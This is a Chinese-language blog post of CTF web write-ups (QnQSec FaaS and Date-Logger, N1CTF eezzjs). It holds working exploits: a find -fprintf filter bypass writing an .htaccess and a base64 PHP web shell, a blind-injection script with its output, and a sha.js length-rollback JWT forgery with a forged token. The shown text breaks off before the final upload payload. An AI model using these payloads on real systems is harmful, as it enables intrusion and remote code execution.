<!DOCTYPE html>
<html lang=en>
<head><meta name="generator" content="Hexo 3.9.0">
    <!-- hexo-inject:begin --><!-- hexo-inject:end --><!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="QnQSec CTF 2025 web FaaS123456789101112131415161718&amp;lt;?php    $cmd = $_GET[&apos;cmd&apos;];    if (!isset($cmd)) &amp;#123;        highlight_file(__FILE__) &amp;amp;&amp;amp; die();    &amp;#125;        if (strpos($cmd, &quot;;&quot;)">
<meta property="og:type" content="article">
<meta property="og:title" content="Some CTF">
<meta property="og:url" content="http://yoursite.com/2025/10/18/QnQSecctf2025/index.html">
<meta property="og:site_name" content="Deen&#39;s blog">
<meta property="og:description" content="QnQSec CTF 2025 web FaaS123456789101112131415161718&amp;lt;?php    $cmd = $_GET[&apos;cmd&apos;];    if (!isset($cmd)) &amp;#123;        highlight_file(__FILE__) &amp;amp;&amp;amp; die();    &amp;#125;        if (strpos($cmd, &quot;;&quot;)">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://lh3.googleusercontent.com/d/1PjncwFhY-OSydH8jPX6ETNnOKmrHfnLa">
<meta property="og:image" content="https://lh3.googleusercontent.com/d/1KD1GTWcsKWSMFbeyaG43OjqyB0CtKP3Z">
<meta property="og:image" content="https://lh3.googleusercontent.com/d/1hl5Q1CVxMcj2pG2ytGSYjTz_6_Xkft8E">
<meta property="og:image" content="https://lh3.googleusercontent.com/d/1YopmG6r9INKHmKJ6iD_EMiLhH_Yv3EYQ">
<meta property="og:image" content="https://lh3.googleusercontent.com/d/1TgSelSPpFjnHfzwrcPZt0dRJifhJNKyW">
<meta property="og:image" content="https://lh3.googleusercontent.com/d/1Qbx0NKlBt7drVni9d2QEiidFOTb-4PEk">
<meta property="og:updated_time" content="2025-11-19T16:36:42.660Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Some CTF">
<meta name="twitter:description" content="QnQSec CTF 2025 web FaaS123456789101112131415161718&amp;lt;?php    $cmd = $_GET[&apos;cmd&apos;];    if (!isset($cmd)) &amp;#123;        highlight_file(__FILE__) &amp;amp;&amp;amp; die();    &amp;#125;        if (strpos($cmd, &quot;;&quot;)">
<meta name="twitter:image" content="https://lh3.googleusercontent.com/d/1PjncwFhY-OSydH8jPX6ETNnOKmrHfnLa">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/d33n.jpg" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/d33n.jpg">
          
        
    
    <!-- title -->
    <title>Some CTF</title>
    <!-- styles -->
    <link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
    <link rel="stylesheet" href="/lib/meslo-LG/styles.css">
    <link rel="stylesheet" href="/lib/justified-gallery/justifiedGallery.min.css">
    <link rel="stylesheet" href="/css/style.css">
    <!-- rss -->
    
    
    <!-- jquery -->
    <script src="/lib/jquery/jquery.min.js"></script><!-- hexo-inject:begin --><!-- hexo-inject:end -->
</head>

<meta name="theme-color" content="#000000">
<body>
    
    <!-- hexo-inject:begin --><!-- hexo-inject:end --><div class="background">
      
        <div id="header-post">
  <a id="menu-icon" href="#"><i class="fa fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fa fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Archives</a></li>
         
          <li><a href="/about/">About</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" href="/2025/08/31/blob/"><i class="fa fa-chevron-right" aria-hidden="true" onmouseover='$("#i-next").toggle();' onmouseout='$("#i-next").toggle();'></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa fa-chevron-up" aria-hidden="true" onmouseover='$("#i-top").toggle();' onmouseout='$("#i-top").toggle();'></i></a></li>
        <!-- <li><a class="icon" href="#"><i class="fa fa-share-alt" aria-hidden="true" onmouseover='$("#i-share").toggle();' onmouseout='$("#i-share").toggle();' onclick='$("#share").toggle();return false;'></i></a></li> -->
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <!-- <span id="i-share" class="info" style="display:none;">Share post</span> -->
    </span>
    <br/>
    <!-- <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2025/10/18/QnQSecctf2025/"><i class="fa fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2025/10/18/QnQSecctf2025/&text=Some CTF"><i class="fa fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2025/10/18/QnQSecctf2025/&title=Some CTF"><i class="fa fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2025/10/18/QnQSecctf2025/&is_video=false&description=Some CTF"><i class="fa fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Some CTF&body=Check out this article: http://yoursite.com/2025/10/18/QnQSecctf2025/"><i class="fa fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2025/10/18/QnQSecctf2025/&title=Some CTF"><i class="fa fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2025/10/18/QnQSecctf2025/&title=Some CTF"><i class="fa fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2025/10/18/QnQSecctf2025/&title=Some CTF"><i class="fa fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2025/10/18/QnQSecctf2025/&title=Some CTF"><i class="fa fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2025/10/18/QnQSecctf2025/&name=Some CTF&description="><i class="fa fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div> -->
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#QnQSec-CTF-2025-web-FaaS"><span class="toc-number">1.</span> <span class="toc-text">QnQSec CTF 2025 web FaaS</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#QnQSec-CTF-2025-web-Date-Logger"><span class="toc-number">2.</span> <span class="toc-text">QnQSec CTF 2025 web  Date-Logger</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#N1CTF-2025-eezzjs"><span class="toc-number">3.</span> <span class="toc-text">N1CTF 2025 eezzjs</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#AmateursCTF-2025-web-desafe"><span class="toc-number">4.</span> <span class="toc-text">AmateursCTF 2025 web/desafe</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PwnSec-CTF-2025-A-Very-Safe-Locker-Indeed"><span class="toc-number">5.</span> <span class="toc-text">PwnSec CTF 2025 | A Very Safe Locker Indeed</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PwnSec-CTF-2025-OhMyPP"><span class="toc-number">6.</span> <span class="toc-text">PwnSec CTF 2025 | OhMyPP</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PwnSec-CTF-2025-FireLeak"><span class="toc-number">7.</span> <span class="toc-text">PwnSec CTF 2025 | FireLeak</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PwnSec-CTF-2025-PSPD"><span class="toc-number">8.</span> <span class="toc-text">PwnSec CTF 2025 | PSPD</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PwnSec-CTF-2025-MaxPayne"><span class="toc-number">9.</span> <span class="toc-text">PwnSec CTF 2025 | MaxPayne</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Devil-Net-v2"><span class="toc-number">10.</span> <span class="toc-text">Devil Net v2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Backup"><span class="toc-number">11.</span> <span class="toc-text">Backup</span></a></li></ol>
    </div>
  </span>
</div>

      
      <div class="content index width mx-auto px2 my4">
          
          <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Some CTF
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Deen's blog</span>
      </span>
      
    <div class="postdate">
        <time datetime="2025-10-18T22:31:22.000Z" itemprop="datePublished">2025-10-18</time>
    </div>


      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="QnQSec-CTF-2025-web-FaaS"><a href="#QnQSec-CTF-2025-web-FaaS" class="headerlink" title="QnQSec CTF 2025 web FaaS"></a>QnQSec CTF 2025 web FaaS</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $cmd = $_GET[<span class="string">'cmd'</span>];</span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">isset</span>($cmd)) &#123;</span><br><span class="line">        highlight_file(<span class="keyword">__FILE__</span>) &amp;&amp; <span class="keyword">die</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> (strpos($cmd, <span class="string">";"</span>) !== <span class="keyword">False</span> || strpos($cmd, <span class="string">"|"</span>) !== <span class="keyword">False</span> || strpos($cmd, <span class="string">"$"</span>) !== <span class="keyword">False</span> ||</span><br><span class="line">    strpos($cmd, <span class="string">"`"</span>) !== <span class="keyword">False</span> || strpos($cmd, <span class="string">"&amp;"</span>) !== <span class="keyword">False</span> || strpos($cmd, <span class="string">"\n"</span>) !== <span class="keyword">False</span> ||</span><br><span class="line">    strpos($cmd, <span class="string">"&gt;"</span>) !== <span class="keyword">False</span> || strpos($cmd, <span class="string">"&lt;"</span>) !== <span class="keyword">False</span> || strpos($cmd, <span class="string">"("</span>) !== <span class="keyword">False</span> ||</span><br><span class="line">    strpos($cmd, <span class="string">")"</span>) !== <span class="keyword">False</span> || strpos($cmd, <span class="string">" "</span>) !== <span class="keyword">False</span> || strpos($cmd, <span class="string">"\r"</span>) !== <span class="keyword">False</span> ||</span><br><span class="line">    strpos($cmd, <span class="string">"+"</span>) !== <span class="keyword">False</span> || strpos($cmd, <span class="string">"&#123;"</span>) !== <span class="keyword">False</span> || strpos($cmd, <span class="string">"&#125;"</span>) !== <span class="keyword">False</span> ||</span><br><span class="line">    strpos($cmd, <span class="string">"["</span>) !== <span class="keyword">False</span> || strpos($cmd, <span class="string">"]"</span>) !== <span class="keyword">False</span>) &#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"Bad bad hacker :&lt;"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    $cmd = <span class="string">"find "</span> . $cmd;</span><br><span class="line">    system($cmd);</span><br></pre></td></tr></table></figure>

<p>分析并尝试之后得出几个可以确定的点：</p>
<ul>
<li>过滤了的这些字符，无法实现另起一个命令</li>
<li>-exec这条路走不通</li>
</ul>
<p>然后一番查找找到 -fprintf 这个东西，通过find -fprintf 可以实现任意文件写入。</p>
<p>那剩下就是任意写入文件漏洞的攻击。经过尝试之后又可以分析出几点：</p>
<ul>
<li>过滤了尖括号，无法直接写入PHP文件</li>
<li>无法写入定时任务</li>
</ul>
<p>最后通过.htaccess 经过一个base64.</p>
<p>htaccess的内容：</p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php_value auto_prepend_file php://<span class="built_in">filter</span>/<span class="built_in">read</span>=<span class="built_in">convert</span>.base64-decode/resource=<span class="keyword">a</span>.jpg</span><br></pre></td></tr></table></figure>

<p>再写入一个a.jpg的shell</p>
<p><code>http://161.97.155.116:8888/?cmd=/bin/whoami%09-fprintf%09.htaccess%09&quot;php_value%09auto_prepend_file%09php://filter/read=convert.base64-decode/resource=a.jpg&quot;</code></p>
<p><code>http://161.97.155.116:8888/?cmd=/bin/whoami%09-fprintf%09a.jpg%09&quot;PD9waHAKaWYgKGlzc2V0KCRfR0VUWydjJ10pKSB7CiAgICBAc3lzdGVtKCRfR0VUWydjJ10pOwp9&quot;&amp;c=/readflag%20i%20want%20the%20flag%20please</code></p>
<p><code>QnQSec{big_thanks_2_🍊_4876three}</code></p>
<p>大部分人用的fprintf支持8禁止编码解的。</p>
<h2 id="QnQSec-CTF-2025-web-Date-Logger"><a href="#QnQSec-CTF-2025-web-Date-Logger" class="headerlink" title="QnQSec CTF 2025 web  Date-Logger"></a>QnQSec CTF 2025 web  Date-Logger</h2><p>传入一个超大的PHPSESSID=8889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988891;</p>
<p>会触发服务端报错。</p>
<blockquote>
<p><b>Warning</b>:  session_destroy(): Trying to destroy uninitialized session in <b>/var/www/html/index.php</b> on line <b></b></p>
</blockquote>
<p>直接盲注</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line"><span class="comment"># -- 配置区 --</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 目标URL</span></span><br><span class="line">URL = <span class="string">"http://161.97.155.116:8889/"</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 从你的请求中复制的HTTP头部信息</span></span><br><span class="line"><span class="comment"># 注意：Content-Length 和 Host 通常由requests库自动管理，这里可以省略</span></span><br><span class="line">HEADERS = &#123;</span><br><span class="line">    <span class="string">'Cache-Control'</span>: <span class="string">'max-age=0'</span>,</span><br><span class="line">    <span class="string">'Origin'</span>: <span class="string">'http://161.97.155.116:8889'</span>,</span><br><span class="line">    <span class="string">'Content-Type'</span>: <span class="string">'application/x-www-form-urlencoded'</span>,</span><br><span class="line">    <span class="string">'Upgrade-Insecure-Requests'</span>: <span class="string">'1'</span>,</span><br><span class="line">    <span class="string">'User-Agent'</span>: <span class="string">'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36'</span>,</span><br><span class="line">    <span class="string">'Accept'</span>: <span class="string">'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'</span>,</span><br><span class="line">    <span class="string">'Referer'</span>: <span class="string">'http://161.97.155.116:8889/'</span>,</span><br><span class="line">    <span class="comment"># 将你提供的完整Cookie放在这里</span></span><br><span class="line">    <span class="string">'Cookie'</span>: <span class="string">'PHPSESSID=888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988898889888988891;'</span>,</span><br><span class="line">    <span class="string">'Accept-Encoding'</span>: <span class="string">'gzip, deflate, br'</span>,</span><br><span class="line">    <span class="string">'Accept-Language'</span>: <span class="string">'en,zh-CN;q=0.9,zh-HK;q=0.8,zh;q=0.7'</span>,</span><br><span class="line">    <span class="string">'Connection'</span>: <span class="string">'keep-alive'</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># -- 脚本核心逻辑 --</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">solve_blind_injection</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="string">"""</span></span><br><span class="line"><span class="string">    执行布尔盲注攻击来获取flag，尝试所有可见的ASCII字符。</span></span><br><span class="line"><span class="string">    """</span></span><br><span class="line">    <span class="comment"># 定义flag中可能出现的字符集 (所有可见的ASCII字符)</span></span><br><span class="line">    <span class="comment"># string.printable 包含字母、数字、标点符号和空白字符</span></span><br><span class="line">    <span class="comment"># 我们通常在flag中不需要空白字符，所以这里使用 string.ascii_letters, string.digits, 和 string.punctuation</span></span><br><span class="line">    charset = string.ascii_letters + string.digits + string.punctuation + <span class="string">'&#123;&#125;'</span>  <span class="comment"># 确保大括号在内</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># 或者，使用ASCII码范围生成字符集</span></span><br><span class="line">    <span class="comment"># charset = ''.join(chr(i) for i in range(32, 127))</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># 初始化已知的flag前缀和session</span></span><br><span class="line">    known_flag = <span class="string">"QnQSec&#123;f_u_linux_"</span></span><br><span class="line">    session = requests.Session()</span><br><span class="line"></span><br><span class="line">    print(<span class="string">"[*] 开始进行布尔盲注攻击..."</span>)</span><br><span class="line">    print(<span class="string">f"[*] 已知前缀: <span class="subst">&#123;known_flag&#125;</span>"</span>)</span><br><span class="line">    print(<span class="string">f"[*] 将会尝试的字符集: <span class="subst">&#123;charset&#125;</span>"</span>)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 循环直到找到结束符 '&#125;'</span></span><br><span class="line">    <span class="keyword">while</span> <span class="keyword">not</span> known_flag.endswith(<span class="string">'&#125;'</span>):</span><br><span class="line">        found_next_char = <span class="literal">False</span></span><br><span class="line">        <span class="keyword">for</span> char_to_guess <span class="keyword">in</span> charset:</span><br><span class="line">            <span class="comment"># 构造本次猜测的payload</span></span><br><span class="line">            payload = known_flag + char_to_guess</span><br><span class="line"></span><br><span class="line">            <span class="comment"># 准备POST的数据</span></span><br><span class="line">            post_data = &#123;<span class="string">'search'</span>: payload&#125;</span><br><span class="line"></span><br><span class="line">            print(<span class="string">f"\r[*] 正在尝试: <span class="subst">&#123;payload.ljust(<span class="number">60</span>)&#125;</span>"</span>, end=<span class="string">""</span>)</span><br><span class="line"></span><br><span class="line">            <span class="keyword">try</span>:</span><br><span class="line">                <span class="comment"># 发送POST请求</span></span><br><span class="line">                response = session.post(URL, headers=HEADERS, data=post_data, timeout=<span class="number">10</span>)</span><br><span class="line">                response.raise_for_status()  <span class="comment"># 如果请求失败 (例如 404, 500), 抛出异常</span></span><br><span class="line"></span><br><span class="line">                <span class="comment"># 关键判断：检查响应中是否包含 "session_destroy" 关键字</span></span><br><span class="line">                <span class="comment"># 这个关键字表示我们的猜测是正确的</span></span><br><span class="line">                <span class="keyword">if</span> <span class="string">'session_destroy'</span> <span class="keyword">in</span> response.text:</span><br><span class="line">                    known_flag += char_to_guess</span><br><span class="line">                    print(<span class="string">f"\n[+] 字符找到! 当前Flag: <span class="subst">&#123;known_flag&#125;</span>"</span>)</span><br><span class="line">                    found_next_char = <span class="literal">True</span></span><br><span class="line">                    <span class="keyword">break</span>  <span class="comment"># 跳出内层循环，开始猜下一个字符</span></span><br><span class="line"></span><br><span class="line">            <span class="keyword">except</span> requests.exceptions.Timeout:</span><br><span class="line">                print(<span class="string">f"\n[!] 请求超时: 正在尝试 '<span class="subst">&#123;payload&#125;</span>'"</span>)</span><br><span class="line">                print(<span class="string">"[*] 可能是网络问题或服务器响应慢，继续尝试下一个字符..."</span>)</span><br><span class="line">                <span class="keyword">continue</span></span><br><span class="line"></span><br><span class="line">            <span class="keyword">except</span> requests.exceptions.RequestException <span class="keyword">as</span> e:</span><br><span class="line">                print(<span class="string">f"\n[!] 请求出错: <span class="subst">&#123;e&#125;</span>"</span>)</span><br><span class="line">                print(<span class="string">"[*] 脚本将在5秒后重试..."</span>)</span><br><span class="line">                time.sleep(<span class="number">5</span>)</span><br><span class="line">                <span class="keyword">continue</span>  <span class="comment"># 跳过此次循环</span></span><br><span class="line"></span><br><span class="line">        <span class="comment"># 如果遍历完所有字符都没找到，说明字符集不全或逻辑有误</span></span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> found_next_char:</span><br><span class="line">            print(<span class="string">"\n[!] 无法找到下一个字符。可能的原因："</span>)</span><br><span class="line">            print(<span class="string">"    1. 目标flag包含的字符不在当前字符集中。"</span>)</span><br><span class="line">            print(<span class="string">"    2. 攻击逻辑失效或已被修复。"</span>)</span><br><span class="line">            print(<span class="string">"    3. 网络连接不稳定。"</span>)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">    print(<span class="string">"\n[+] 攻击完成!"</span>)</span><br><span class="line">    <span class="keyword">if</span> known_flag.endswith(<span class="string">'&#125;'</span>):</span><br><span class="line">        print(<span class="string">f"[*] 最终找到的Flag是: <span class="subst">&#123;known_flag&#125;</span>"</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        print(<span class="string">f"[*] 攻击中止，当前已找到的部分: <span class="subst">&#123;known_flag&#125;</span>"</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    solve_blind_injection()</span><br></pre></td></tr></table></figure>

<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-attr">[*]</span> 正在尝试: <span class="selector-tag">QnQSec</span>&#123;<span class="attribute">f_u_linux_</span>:sad:!                                     </span><br><span class="line">[+] 字符找到! 当前Flag: QnQSec&#123;f_u_linux_:sad:!</span><br><span class="line">[*] 正在尝试: QnQSec&#123;f_u_linux_:sad:!&#125;                                    </span><br><span class="line"><span class="selector-attr">[+]</span> 字符找到! 当前<span class="selector-tag">Flag</span>: <span class="selector-tag">QnQSec</span>&#123;<span class="attribute">f_u_linux_</span>:sad:!&#125;</span><br><span class="line"></span><br><span class="line"><span class="selector-attr">[+]</span> 攻击完成!</span><br><span class="line"><span class="selector-attr">[*]</span> 最终找到的<span class="selector-tag">Flag</span>是: <span class="selector-tag">QnQSec</span>&#123;<span class="attribute">f_u_linux_</span>:sad:!&#125;</span><br></pre></td></tr></table></figure>

<h2 id="N1CTF-2025-eezzjs"><a href="#N1CTF-2025-eezzjs" class="headerlink" title="N1CTF 2025 eezzjs"></a>N1CTF 2025 eezzjs</h2><p>这里思路比较直接：突破JWT校验，上传，然后利用SSTI命令执行来获取Flag.</p>
<p>这个分析费劲了一会，都快分析出来了，然后一搜索，结果发现是个CVE. </p>
<p><a href="https://github.com/advisories/GHSA-95m3-7q98-8xr5" target="_blank" rel="noopener">https://github.com/advisories/GHSA-95m3-7q98-8xr5</a></p>
<p>核心就是传入一个对象，对象有length属性，可以设置成负数，实现回滚。</p>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&gt; require('sha.js')('sha256').update('foo').digest('hex')</span><br><span class="line">'2c26b46b68ffc68ff99b453c1d<span class="number">3041341342</span>2d<span class="number">706483</span>bfa0f98a5e<span class="number">886266</span>e7ae'</span><br><span class="line">&gt; require('sha.js')('sha256').update('fooabc').update(&#123;length:-<span class="number">3</span>&#125;).digest('hex')</span><br><span class="line">'2c26b46b68ffc68ff99b453c1d<span class="number">3041341342</span>2d<span class="number">706483</span>bfa0f98a5e<span class="number">886266</span>e7ae'</span><br></pre></td></tr></table></figure>

<p>题目中，传入了三个参数进行，前两个都是可控的，主要是最后一个secret是未知的。</p>
<p>这里的关键点就是，回滚的长度把secret和header的长度都算上。</p>
<p>这样算下来 长度是45，那么payload就是<code>{&quot;length&quot;:-45}</code></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> sha256 = <span class="function">(<span class="params">...messages</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">const</span> hash = sha(<span class="string">'sha256'</span>);</span><br><span class="line">    messages.forEach(<span class="function">(<span class="params">m</span>) =&gt;</span> &#123;</span><br><span class="line">        <span class="built_in">console</span>.log(<span class="keyword">typeof</span> m);</span><br><span class="line">        <span class="built_in">console</span>.log(m);</span><br><span class="line">        hash.update(m);</span><br><span class="line">    &#125;);</span><br><span class="line">    <span class="keyword">return</span> hash.digest(<span class="string">'hex'</span>);</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> expectedSignatureHex = sha256(...[<span class="built_in">JSON</span>.stringify(header), payload, secret]);</span><br></pre></td></tr></table></figure>

<p>然后本地调试 拿到响应的签名值是674dcdbbb09261235ee8efc1999daee725dad0ec314a8d1d80cb11229e7596c1</p>
<p>最后Token是 <code>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsZW5ndGgiOi00NX0=.674dcdbbb09261235ee8efc1999daee725dad0ec314a8d1d80cb11229e7596c1</code></p>
<p><img src="https://lh3.googleusercontent.com/d/1PjncwFhY-OSydH8jPX6ETNnOKmrHfnLa" alt></p>
<p>然后是突破上传 文件后缀不允许出现js字符串。</p>
<figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">if</span> (/js/i.test(ext)) &#123;</span><br><span class="line">    <span class="keyword">return</span>  res.status(<span class="number">403</span>).<span class="built_in">send</span>(<span class="string">'Denied filename'</span>)<span class="comment">;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里踩了点坑，思路乱了，应该用排除法，确定一些已经能够定下来的东西，再从旁边去突破。<br>例如这里一定确定了一定使用ejs，那剩下突破应该是主要在上传。</p>
<p>最后上传的payload.</p>
